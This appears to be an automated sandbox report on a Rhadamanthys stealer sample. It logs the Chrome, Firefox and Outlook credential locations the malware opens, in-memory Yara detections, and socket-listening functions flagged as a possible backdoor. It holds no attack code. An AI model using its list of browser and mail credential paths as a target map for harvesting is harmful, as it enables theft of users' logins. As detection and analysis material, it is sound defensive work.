Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534d Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\881ae04a-fa90-4a62-8eee-5ae000467040 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cache2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior

Remote Access Functionality
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1770896929.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1776058273.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1774245020.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1772517480.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1661729076.000000001BA01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1751813778.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1764199832.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1758049624.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1767980994.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1745060493.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1765364016.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1730971445.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1759435128.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1749345129.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1748274287.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1627889710.000001F9DF920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1770471428.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1737974066.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1733891571.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1775675719.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1758603457.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1738781521.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1750663652.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1766830436.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1737361189.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1746053538.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1735264963.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1771728010.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1764871739.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1732324317.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1602767929.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1752123123.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1739761324.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1738314505.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1749877777.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1754168196.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1726579095.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1734444495.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1752709890.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1753586274.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1748873710.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1742093895.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1763763009.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1745501240.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1755359019.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1774918323.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1736566513.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1748590947.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1756177662.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1757743595.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1773734067.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1735678354.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1740296656.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1756708487.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1752460608.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1744204587.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1731959678.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1740765343.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1726579095.000001F9E0C91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1736978478.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1750934596.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1731676215.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1751248603.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1753303535.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1766516787.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1767428012.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1755616290.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1731420429.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1765992633.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1750138359.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1754962335.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1742638722.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1747838363.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1742967878.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1736196050.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1754590766.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1751538386.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1774468300.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1757113350.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1761379644.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1743292419.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D286B50 bind,WSAGetLastError,closesocket, 4_2_00007FF63D286B50
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D286860 bind,listen,WSAGetLastError,closesocket, 4_2_00007FF63D286860
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0416860 bind,listen,WSAGetLastError,closesocket, 18_2_00007FF7F0416860
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F0416B50 bind,WSAGetLastError,closesocket, 18_2_00007FF7F0416B50
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
